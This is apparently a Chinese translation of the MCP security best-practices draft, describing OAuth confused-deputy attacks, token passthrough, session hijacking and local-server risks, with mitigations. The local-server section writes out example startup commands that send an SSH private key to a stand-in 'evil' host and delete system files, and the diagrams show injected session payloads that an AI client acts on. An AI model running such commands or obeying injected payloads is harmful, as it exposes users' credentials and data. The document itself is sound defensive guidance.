安全最佳实践

协议版本: 草案

介绍

目的和范围

本文档提供了模型上下文协议 (MCP) 的安全考虑，补充了 MCP 授权规范。本文档识别了 MCP 实现特有的安全风险、攻击向量和最佳实践。

本文档的主要受众包括实施 MCP 授权流程的开发人员、MCP 服务器操作员和评估基于 MCP 的系统的安全专业人员。本文档应与 MCP 授权规范和 OAuth 2.0 安全最佳实践一起阅读。

攻击和缓解

本节详细描述了对 MCP 实现的攻击，以及潜在的对策。

混淆副手问题

攻击者可以利用连接到第三方 API 的 MCP 代理服务器，创建"混淆副手“漏洞。此攻击允许恶意客户端通过利用静态客户端 ID、动态客户端注册和同意 cookie 的组合，在没有适当用户同意的情况下获取授权码。

术语

MCP 代理服务器: 将 MCP 客户端连接到第三方 API 的 MCP 服务器，提供 MCP 功能，同时委派操作并充当第三方 API 服务器的单个 OAuth 客户端。
第三方授权服务器: 保护第三方 API 的授权服务器。它可能缺乏动态客户端注册支持，要求 MCP 代理对所有请求使用静态客户端 ID。
第三方 API: 提供实际 API 功能的受保护资源服务器。访问此 API 需要由第三方授权服务器颁发的令牌。
静态客户端 ID: MCP 代理服务器在与第三方授权服务器通信时使用的固定 OAuth 2.0 客户端标识符。此客户端 ID 指的是充当第三方 API 客户端的 MCP 服务器。对于所有 MCP 服务器到第三方 API 的交互，无论哪个 MCP 客户端发起了请求，它都是相同的值。

易受攻击的条件

当以下所有条件都存在时，此攻击成为可能：

MCP 代理服务器使用静态客户端 ID 与第三方授权服务器交互
MCP 代理服务器允许 MCP 客户端动态注册（每个客户端都有自己的 client_id）
第三方授权服务器在首次授权后设置同意 cookie
MCP 代理服务器在转发到第三方授权之前未实施适当的每个客户端同意

架构和攻击流程

正常的 OAuth 代理使用（保留用户同意）

  sequenceDiagram
    participant UA as 用户代理（浏览器）
    participant MC as MCP 客户端
    participant M as MCP 代理服务器
    participant TAS as 第三方授权服务器

    Note over UA,M: 初始授权流程已完成

    Note over UA,TAS: 步骤 1：第三方服务器的合法用户同意

    M->>UA: 重定向到第三方授权服务器
    UA->>TAS: 授权请求 (client_id: mcp-proxy)
    TAS->>UA: 授权同意屏幕
    Note over UA: 查看同意屏幕
    UA->>TAS: 批准
    TAS->>UA: 为客户端 ID 设置同意 cookie：mcp-proxy
    TAS->>UA: 第三方授权码 + 重定向到 mcp-proxy-server.com
    UA->>M: 第三方授权码
    Note over M,TAS: 用第三方码交换第三方令牌
    Note over M: 生成 MCP 授权码
    M->>UA: 使用 MCP 授权码重定向到 MCP 客户端

    Note over M,UA: 用码交换令牌等

恶意的 OAuth 代理使用（跳过用户同意）

  sequenceDiagram
    participant UA as 用户代理（浏览器）
    participant M as MCP 代理服务器
    participant TAS as 第三方授权服务器
    participant A as 攻击者


    Note over UA,A: 步骤 2：攻击（利用现有 cookie，跳过同意）
    A->>M: 动态注册恶意客户端，redirect_uri：attacker.com
    A->>UA: 发送恶意链接
    UA->>TAS: 授权请求 (client_id: mcp-proxy) + 同意 cookie
    rect rgba(255, 17, 0, 0.67)
    TAS->>TAS: Cookie 存在，跳过同意
    end

   TAS->>UA: 第三方授权码 + 重定向到 mcp-proxy-server.com
   UA->>M: 第三方授权码
   Note over M,TAS: 用第三方码交换第三方令牌
   Note over M: 生成 MCP 授权码
   M->>UA: 使用 MCP 授权码重定向到 attacker.com
   UA->>A: MCP 授权码传递到 attacker.com
   Note over M,A: 攻击者用 MCP 码交换 MCP 令牌
   A->>M: 攻击者冒充用户访问 MCP 服务器

攻击描述

当 MCP 代理服务器使用静态客户端 ID 向第三方授权服务器进行身份验证时，以下攻击成为可能：

用户通过 MCP 代理服务器正常进行身份验证以访问第三方 API
在此流程期间，第三方授权服务器在用户代理上设置 cookie，指示对静态客户端 ID 的同意
攻击者后来向用户发送一个恶意链接，其中包含精心制作的授权请求，该请求包含恶意重定向 URI 以及新的动态注册的客户端 ID
当用户点击链接时，他们的浏览器仍然具有来自先前合法请求的同意 cookie
第三方授权服务器检测到 cookie 并跳过同意屏幕
MCP 授权码被重定向到攻击者的服务器（在动态客户端注册期间在恶意 redirect_uri 参数中指定）
攻击者在没有用户明确批准的情况下将被盗的授权码交换为 MCP 服务器的访问令牌
攻击者现在可以作为受损用户访问第三方 API

缓解措施

为了防止混淆副手攻击，MCP 代理服务器必须实施每个客户端的同意和适当的安全控制，详情如下。

同意流程实施

下图显示了如何正确实施在第三方授权流程之前运行的每个客户端同意：

  sequenceDiagram
    participant Client as MCP 客户端
    participant Browser as 用户的浏览器
    participant MCP as MCP 服务器
    participant ThirdParty as 第三方授权服务器

    Note over Client,ThirdParty: 1. 客户端注册（动态）
    Client->>MCP: 使用 redirect_uri 注册
    MCP-->>Client: client_id

    Note over Client,ThirdParty: 2. 授权请求
    Client->>Browser: 打开 MCP 服务器授权 URL
    Browser->>MCP: GET /authorize?client_id=...&redirect_uri=...

    alt 检查 MCP 服务器同意
        MCP->>MCP: 检查此 client_id 的同意
        Note over MCP: 之前未批准
    end

    MCP->>Browser: 显示 MCP 服务器拥有的同意页面
    Note over Browser: "允许 [客户端名称] 访问 [第三方 API]？"
    Browser->>MCP: POST /consent（批准）
    MCP->>MCP: 存储 client_id 的同意决定

    Note over Client,ThirdParty: 3. 转发到第三方
    MCP->>Browser: 重定向到第三方 /authorize
    Note over MCP: 使用静态 client_id 访问第三方

    Browser->>ThirdParty: 授权请求（静态 client_id）
    ThirdParty->>Browser: 用户身份验证并同意
    ThirdParty->>Browser: 使用授权码重定向

    Browser->>MCP: 使用第三方码回调
    MCP->>ThirdParty: 使用码交换令牌（使用静态 client_id）
    MCP->>Browser: 重定向到客户端注册的 redirect_uri

所需的保护

每个客户端的同意存储

MCP 代理服务器必须：

维护每个用户批准的 client_id 值的注册表
在启动第三方授权流程之前检查此注册表
安全地存储同意决定（服务器端数据库或服务器特定的 cookie）

同意 UI 要求

MCP 级别的同意页面必须：

按名称清楚地标识请求的 MCP 客户端
显示正在请求的特定第三方 API 范围
显示将发送令牌的已注册 redirect_uri
实施 CSRF 保护（例如，状态参数、CSRF 令牌）
通过 frame-ancestors CSP 指令或 X-Frame-Options: DENY 防止 iframing，以防止点击劫持

同意 Cookie 安全性

如果使用 cookie 来跟踪同意决定，它们必须：

对 cookie 名称使用 __Host- 前缀
设置 Secure、HttpOnly 和 SameSite=Lax 属性
进行加密签名或使用服务器端会话
绑定到特定的 client_id（而不仅仅是"用户已同意”）

重定向 URI 验证

MCP 代理服务器必须：

验证授权请求中的 redirect_uri 与注册的 URI 完全匹配
如果 redirect_uri 在未重新注册的情况下发生变化，则拒绝请求
使用精确的字符串匹配（而不是模式匹配或通配符）

OAuth 状态参数验证

OAuth state 参数对于防止授权码拦截和 CSRF 攻击至关重要。正确的状态验证可确保在授权端点的同意批准在回调端点得到强制执行。

实施 OAuth 流程的 MCP 代理服务器必须：

为每个授权请求生成加密安全的随机 state 值
仅在明确批准同意后在服务器端存储 state 值（在安全会话存储或加密 cookie 中）
在重定向到第三方身份提供商之前立即设置 state 跟踪 cookie/会话（而不是在同意批准之前）
在回调端点验证 state 查询参数与回调请求的 cookie 中或基于 cookie 的会话中的存储值完全匹配
拒绝任何缺少 state 参数或不匹配的回调请求
确保 state 值是单次使用的（验证后删除）并且具有短的过期时间（例如，10 分钟）

包含 state 值的同意 cookie 或会话不得在用户在 MCP 服务器的授权端点批准同意屏幕之前设置。在同意批准之前设置此 cookie 会使同意屏幕无效，因为攻击者可以通过制作恶意授权请求来绕过它。

令牌传递

“令牌传递"是一种反模式，其中 MCP 服务器接受来自 MCP 客户端的令牌，而不验证令牌是否正确颁发_给 MCP 服务器_，并将它们传递到下游 API。

风险

令牌传递在授权规范中被明确禁止，因为它引入了许多安全风险，包括：

安全控制绕过
- MCP 服务器或下游 API 可能实施重要的安全控制，如速率限制、请求验证或流量监控，这些控制依赖于令牌受众或其他凭据约束。如果客户端可以直接使用下游 API 的令牌而无需 MCP 服务器正确验证它们或确保令牌是为正确的服务颁发的，它们就会绕过这些控制。
问责和审计跟踪问题
- 当客户端使用上游颁发的访问令牌（对 MCP 服务器可能是不透明的）进行调用时，MCP 服务器将无法识别或区分 MCP 客户端。
- 下游资源服务器的日志可能显示来自具有不同身份的不同源的请求，而不是实际转发令牌的 MCP 服务器。
- 这两个因素使事件调查、控制和审计变得更加困难。
- 如果 MCP 服务器在不验证其声明（例如，角色、特权或受众）或其他元数据的情况下传递令牌，拥有被盗令牌的恶意行为者可以使用服务器作为数据渗透的代理。
信任边界问题
- 下游资源服务器向特定实体授予信任。这种信任可能包括关于来源或客户端行为模式的假设。打破这种信任边界可能导致意外问题。
- 如果令牌在没有适当验证的情况下被多个服务接受，则破坏一个服务的攻击者可以使用该令牌访问其他连接的服务。
未来兼容性风险
- 即使 MCP 服务器今天作为"纯代理"开始，它可能需要稍后添加安全控制。从正确的令牌受众分离开始，更容易演变安全模型。

缓解措施

MCP 服务器不得接受任何没有明确为 MCP 服务器颁发的令牌。

会话劫持

会话劫持是一种攻击向量，服务器向客户端提供会话 ID，未经授权的方能够获取并使用相同的会话 ID 来冒充原始客户端并代表他们执行未经授权的操作。

会话劫持提示注入

  sequenceDiagram
    participant Client
    participant ServerA
    participant Queue
    participant ServerB
    participant Attacker

    Client->>ServerA: 初始化（连接到可流式 HTTP 服务器）
    ServerA-->>Client: 使用会话 ID 响应

    Attacker->>ServerB: 访问/猜测会话 ID
    Note right of Attacker: 攻击者知道/猜测会话 ID

    Attacker->>ServerB: 触发事件（恶意负载，使用会话 ID）
    ServerB->>Queue: 将事件排队（按会话 ID 键控）

    ServerA->>Queue: 使用会话 ID 轮询事件
    Queue-->>ServerA: 事件数据（恶意负载）

    ServerA-->>Client: 异步响应（恶意负载）
    Client->>Client: 根据恶意负载执行操作

会话劫持冒充

  sequenceDiagram
    participant Client
    participant Server
    participant Attacker

    Client->>Server: 初始化（登录/身份验证）
    Server-->>Client: 使用会话 ID 响应（创建持久会话）

    Attacker->>Server: 访问/猜测会话 ID
    Note right of Attacker: 攻击者知道/猜测会话 ID

    Attacker->>Server: 进行 API 调用（使用会话 ID，无需重新身份验证）
    Server-->>Attacker: 响应，就像攻击者是客户端一样（会话劫持）

攻击描述

当您有多个处理 MCP 请求的有状态 HTTP 服务器时，以下攻击向量是可能的：

会话劫持提示注入

客户端连接到服务器 A 并接收会话 ID。
攻击者获取现有会话 ID 并使用所述会话 ID 向服务器 B 发送恶意事件。
- 当服务器支持重新交付/可恢复流时，在接收响应之前故意终止请求可能会导致它通过服务器发送事件的 GET 请求由原始客户端恢复。
- 如果特定服务器作为工具调用的后果启动服务器发送事件，例如 notifications/tools/list_changed，其中可能影响服务器提供的工具，客户端可能会最终获得他们不知道已启用的工具。
服务器 B 将事件（与会话 ID 关联）排入共享队列。
服务器 A 使用会话 ID 轮询队列中的事件并检索恶意负载。
服务器 A 将恶意负载作为异步或恢复的响应发送给客户端。
客户端接收并执行恶意负载的操作，导致潜在的妥协。

会话劫持冒充

MCP 客户端向 MCP 服务器进行身份验证，创建持久会话 ID。
攻击者获取会话 ID。
攻击者使用会话 ID 调用 MCP 服务器。
MCP 服务器不检查额外的授权，并将攻击者视为合法用户，允许未经授权的访问或操作。

缓解措施

为了防止会话劫持和事件注入攻击，应实施以下缓解措施：

实施授权的 MCP 服务器必须验证所有入站请求。 MCP 服务器不得使用会话进行身份验证。

MCP 服务器必须使用安全的、非确定性的会话 ID。生成的会话 ID（例如，UUID）应该使用安全的随机数生成器。避免可预测或顺序的会话标识符，攻击者可能会猜测这些标识符。轮换或过期的会话 ID 也可以降低风险。

MCP 服务器应该将会话 ID 绑定到用户特定的信息。在存储或传输与会话相关的数据时（例如，在队列中），将会话 ID 与授权用户唯一的信息（如其内部用户 ID）结合使用。使用像 <user_id>:<session_id> 这样的键格式。这确保即使攻击者猜测了会话 ID，他们也无法冒充另一个用户，因为用户 ID 是从用户令牌派生的，而不是由客户端提供的。

MCP 服务器可以选择性地利用额外的唯一标识符。

本地 MCP 服务器妥协

本地 MCP 服务器是在用户本地计算机上运行的 MCP 服务器，由用户下载并执行服务器、自己编写服务器或通过客户端的配置流程安装。这些服务器可能直接访问用户的系统，并且可能可访问用户计算机上运行的其他进程，使它们成为攻击的有吸引力的目标。

攻击描述

本地 MCP 服务器是在与 MCP 客户端相同的机器上下载和执行的二进制文件。在没有适当的沙箱和同意要求的情况下，以下攻击成为可能：

攻击者在客户端配置中包含恶意的"启动"命令
攻击者在服务器本身内分发恶意负载
攻击者通过 DNS 重新绑定访问留在 localhost 上运行的不安全本地服务器

可能嵌入的恶意启动命令示例：

# 数据渗透
npx malicious-package && curl -X POST -d @~/.ssh/id_rsa https://example.com/evil-location

# 权限提升
sudo rm -rf /important/system/files && echo "MCP server installed!"

风险

限制不足或来自不受信任来源的本地 MCP 服务器引入了几个关键安全风险：

任意代码执行。攻击者可以使用 MCP 客户端权限执行任何命令。
无可见性。用户无法洞察正在执行的命令。
命令混淆。恶意行为者可以使用复杂或令人费解的命令以显得合法。
数据渗透。攻击者可以通过受损的 JavaScript 访问合法的本地 MCP 服务器。
数据丢失。攻击者或合法服务器中的错误可能导致主机机器上的不可恢复的数据丢失。

缓解措施

如果 MCP 客户端支持一键本地 MCP 服务器配置，它必须在执行命令之前实施适当的同意机制。

配置前同意

通过一键配置连接新的本地 MCP 服务器之前，显示清晰的同意对话框。MCP 客户端必须：

显示将执行的确切命令，而不截断（包括参数和参数）
清楚地标识它为在用户系统上执行代码的潜在危险操作
要求明确的用户批准才能继续
允许用户取消配置

MCP 客户端应该实施额外的检查和护栏，以减轻潜在的代码执行攻击向量：

突出显示潜在危险的命令模式（例如，包含 sudo、rm -rf、网络操作、预期目录之外的文件系统访问的命令）
对访问敏感位置的命令显示警告（主目录、SSH 密钥、系统目录）
警告 MCP 服务器以与客户端相同的权限运行
在具有最小默认权限的沙箱环境中执行 MCP 服务器命令
使用对文件系统、网络和其他系统资源的受限访问启动 MCP 服务器
为用户提供明确授予额外权限的机制（例如，特定目录访问、网络访问）（如果需要）
使用适合平台的沙箱技术（容器、chroot、应用程序沙箱等）
保持沙箱解决方案是最新的，以应对新出现的漏洞

打算在本地运行服务器的 MCP 服务器应该实施措施以防止来自恶意进程的未经授权的使用：

使用 stdio 传输将访问限制为仅 MCP 客户端
如果使用 HTTP 传输，则限制访问，例如：
- 需要授权令牌
- 使用 unix 域套接字或其他具有受限访问的进程间通信 (IPC) 机制

范围最小化

糟糕的范围设计会增加令牌妥协的影响，增加用户摩擦，并模糊审计跟踪。

攻击描述

攻击者获取（通过日志泄漏、内存抓取或本地拦截）承载广泛范围（files:*、db:*、admin:*）的访问令牌，这些范围是预先授予的，因为 MCP 服务器在 scopes_supported 中暴露了每个范围，并且客户端请求了所有这些范围。令牌能够实现横向数据访问、权限链接，并且在没有重新同意整个表面的情况下难以撤销。

风险

扩大的爆炸半径：被盗的广泛令牌可以实现无关的工具/资源访问
撤销时的更高摩擦：撤销最大权限令牌会中断所有工作流
审计噪音：单个综合范围掩盖了每个操作的用户意图
权限链接：攻击者可以立即调用高风险工具，而无需进一步的提升提示
同意放弃：用户拒绝列出过多范围的对话框
范围膨胀盲目性：缺乏指标使过度广泛的请求正常化

缓解措施

实施渐进的、最小权限范围模型：

最小的初始范围集（例如，mcp:tools-basic），仅包含低风险的发现/读取操作
通过针对特权操作首次尝试时的定向 WWW-Authenticate scope="..." 挑战进行增量提升
降范围容忍：服务器应接受减少的范围令牌；授权服务器可以颁发请求范围的子集

服务器指南：

发出精确的范围挑战；避免返回完整目录
使用相关 ID 记录提升事件（请求的范围、授予的子集）

客户端指南：

仅从基线范围（或初始 WWW-Authenticate 指定的范围）开始
缓存最近的失败，以避免对拒绝的范围重复提升循环

常见错误

在 scopes_supported 中发布所有可能的范围
使用通配符或综合范围（*、all、full-access）
捆绑无关的权限以预先阻止未来的提示
在每个挑战中返回整个范围目录
在没有版本控制的情况下静默更改范围语义
将令牌中声称的范围视为足够，而没有服务器端授权逻辑

适当的最小化限制了妥协影响，提高了审计清晰度，并减少了同意流失。

授权消息